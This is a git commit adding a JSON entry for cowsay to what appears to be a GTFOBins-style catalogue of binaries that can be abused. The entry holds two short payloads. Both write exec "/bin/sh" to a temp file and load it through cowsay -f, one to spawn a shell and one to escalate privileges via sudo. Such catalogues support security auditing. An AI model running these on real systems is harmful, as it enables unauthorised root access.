add data source for cowsay

master
Mr. Robot 4 years ago committed by GitHub
parent 209e9a8944
commit d55607f8cc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,15 @@
{
"description": "It allows to execute Perl code, other functions may apply.",
"functions": {
"shell": [
{
"code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\ncowsay -f $TF x\n"
}
],
"sudo": [
{
"code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowsay -f $TF x\n"
}
]
}
}
Loading…
Cancel
Save